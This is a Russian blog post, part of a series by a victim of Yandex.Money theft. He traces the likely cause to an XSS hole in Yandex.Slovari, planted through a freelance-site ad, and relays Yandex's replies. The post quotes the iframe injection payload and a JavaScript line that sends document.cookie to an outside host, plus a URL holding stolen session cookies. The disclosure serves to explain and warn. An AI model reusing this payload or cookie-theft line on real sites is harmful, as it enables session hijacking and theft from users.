Pull to refresh

Как увели мои деньги с кошелька Яндекса. Часть 3. XSS

Reading time 4 min
Views 16K
Продолжение детектива «Как увели мои деньги с кошелька Яндекса». Часть 3. XSS
Предыдущие части можно найти тут:
Часть 1
Часть 2.1
Часть 2.2

Внимание! Часть неожиданная!


В этой части:
  1. Freelance.ru
  2. XSS на Яндекс.Словари
  3. Flashback
  4. Ответ от Яндекс.Денег
  5. Вопросы к Яндексу


Внимание! Никакого PR и АНТИPR в статье не подразумевается!

Freelance.ru


Я, как и многие хабрапользователи иногда поискиваю себе работку на различный сайтах фриланса. Так было и сегодня с утра — встал рано, делать было нечего, вот думал поискать себе работу с напарником. Искал сразу на нескольких сайтах. Увидел одно из предложений на сайте freelance.ru: «Редизайн сайта», да и цена, вроде не плохая: 8000 ру. Дай, думаю открою и погляжу. В задании промелькнуло что-то знакомое, но я как-то пропустил это. Начал смотреть на предложения к работе: все желали выполнить (народ, по ходу дела вообще не читает ничего, тупо предлагает свои услуги) и лишь пару комментариев меня остановили. Один из них гласил:
Когда же ты сдохнешь уже, спамер

Тут я сразу решил вернуться наверх и ткнуть на адрес сайта, указанный в задании: [Внимание! Тыкать на адрес стоит только если вы используете Firefox c NoScript! Почему? Читайте ниже и НЕ тыкайте на ссылку сразу, только после прочтения всей статьи! На всякий случай ссылку изменил по просьбе fstrange и fata1ex] _http://tarandaz.ru. Ткнул. Google Chrome перенес меня на знакомый для меня сайт, однако через пару секунд произошел редирект (так и не понял зачем он так решил сделать). Я увидел пустую страницу…

XSS на Яндекс.Словари


В адресной строке Google Chrome красовался интересный адрес:
http://httpz.ru/nzakazchik.gif?yandexuid=2318214601243884128;%20yp=2145906000.gp.65_084965:103_682149:1:5;%20yandex_gid=43;%20my=YyMCAQAA;%20yandex_mail=my_name;%20Virtual_id=16;%20yandex_login=my_name;%20L=YVdmDX9CAABmCEt8ClVwSn8DYAdBYQAGdy1mWzEVBEAiKClFBR82Pyo+ViQ5AFxTMScSIg4HLz4UJk8DAhIfGg==.1257846938.6157.282848.2cc34301b2ce0d38049606bca0c1f5fc;%20narod_login=my_name;%20Session_id=1257846940.2726.0.38263038.2:208547497:0.62207.1514.047497eb07f8d2e7628d5a62e9bd2bd9;%20yabs-frequency=/2/IE1v08459zvKUW211I6DVcm0WGL1Kjzv08458GIPUG211I7Q07e0WGKXyarw08459oT4UW211ISaq7a0WGKXmUKz0845WVzTUW211I6UZM80WGKXFSTt07W5F000//fGA11G46

Я начал разглядывать его и что я увидел?! Все правильно, переменные, содержащие в себе слова «yandex». Опана! Открываю Firefox с NoScript, перехожу заново по исходной ссылке и NoScript выдает: «Внимание! Предотвращена XSS атака!». «Круто», думаю. Лезу в исходный код основного сайта, вижу там такой тег:
<iframe  src='http://slovari.yandex.ru/search.xml?text=&st_translate=sp%22<script>alert()</script>%3CSCRIPT type=text/javascript src=http://httpz.ru/zakazchikgo.js></SCRIPT>"'  width='0' height='0' style='display:none'></iframe>

Ну, думаю, ни фига себе! Иду по URL с js-скриптом: там такой код:
location.href = "http://httpz.ru/nzakazchik.gif?" + document.cookie;

Все четко! Воруем cookie, заходим от имени пользователя в его кабинет…

Flashback


Тут я вспоминаю, что до того как у меня украли деньги, я тоже бегал по сайту фриланса и уже тыкался в подобное объявление и тоже проходил по ссылке… Откуда у меня взломали профиль — теперь становится понятным. Как сменили пароль — вопрос интереснее. Как узнали платежный пароль — еще интереснее…

Ответ от Яндекс.Денег


Как только я увидел такую схему, отписался sperans. Она ответила мне, что об этой уязвимости передали разработчикам и в такой схеме увести пароль от Яндекс.Денег нельзя (на момент написания топика уязвимость еще доступна). В принципе, я пробовал различные варианты логина, но получить платежный пароль по такой схеме я так и не смог…

Вопросы к Яндексу


  1. Каким образом вы «проводили расследование»? Прочитали сообщение и copypaste из инструкции?!
  2. Почему мне, владельцу аккаунта, не дают никакой информации о том, как сменили мой пароль от аккаунта, с какого ip заходили, пытались ли как-то злоумышленники восстановить мой платежный пароль?
  3. Были ли попытки ввода неверного платежного пароля?
  4. Почему платежный пароль НЕ менялся после взлома? (Был изменен только пароль на аккаунт + дополнительный e-mail...)
  5. Почему эта информация является «СВЕРХКОНФИДЕНЦИАЛЬНОЙ» (да-да, капсом), которая доступна ТОЛЬКО сотрудникам Яндекса и милиции?!

Я понимаю, если бы вы вернули мне деньги — меня бы данные вопросы не особо заботили, но в данном случае ответы мне важны. Так же, как и другим хабрапользователям, я думаю…

Ответы от Яндекса
1. Каким образом вы «проводили расследование»? Прочитали сообщение и copypaste из инструкции?!
— Конечно, не только. Проверили, с какого айпи совершён платёж и куда ушли деньги, а дальше — можно ли их вернуть. Как выясняется, можно ли вернуть — это конфиденциальная информация. Иногда, кстати, очень обидно: за десять минут становится ясно, что дело на 100% для милиции и мы ничего уже сделать не можем — и вот сидим и думаем, сейчас напишем пользователю — он решит, что мы ничего не делали :( а мы просто уже знаем результат.

2. Почему мне, владельцу аккаунта, не дают никакой информации о том, как сменили мой пароль от аккаунта, с какого ip заходили, пытались ли как-то злоумышленники восстановить мой платежный пароль?
— Потому что мы такую информацию не пересылаем по электронной почте. Вам уже в предыдущих топиках это объясняли другие хабровчане.

3. Были ли попытки ввода неверного платежного пароля?
— Это не имеет значения.

4. Почему платежный пароль НЕ менялся после взлома? (Был изменен только пароль на аккаунт + дополнительный e-mail...)
— Это распространённый способ действия. Я не была в голове у злоумышленника, но предполагаю, что он просто не стал заморачиваться. Один пароль на вход поменял -и хватит.

5. Почему эта информация является «СВЕРХКОНФИДЕНЦИАЛЬНОЙ» (да-да, капсом), которая доступна ТОЛЬКО сотрудникам Яндекса и милиции?!
— Вот даже и не знаю, как объяснить, почему информация конфиденциальная. Вот почему ФИО владельца аккаунта конфиденциальная информация? А сумма его последнего платежа за МТС почему конфиденциальная информация, может, там всего 10 рублей, тоже мне секрет?


Если кто-то сможет помочь дальше в раскручивании (в плане помощи понять что происходило после того, как украли cookie) этой ситуации — буду благодарен!

P.S. Из РУВД пока не звонили. Я думаю, я их завтра опережу…

UPD. Яндекс попросил передать, что платежный пароль случае воровства cookie не передается. Хочу заметить, что я такого и не говорил. В топике в 2-х местах сказано что я НЕ знаю как добыли платежный пароль

UPD 2. Как сообщили из Яндекса, уязвимость закрыли.

Следующая часть истории находится здесь: Как увели мои деньги с кошелька Яндекса. Часть 4. Так что там с заявлением?!
Tags:
Hubs:
+186
Comments 195
Comments Comments 195

Articles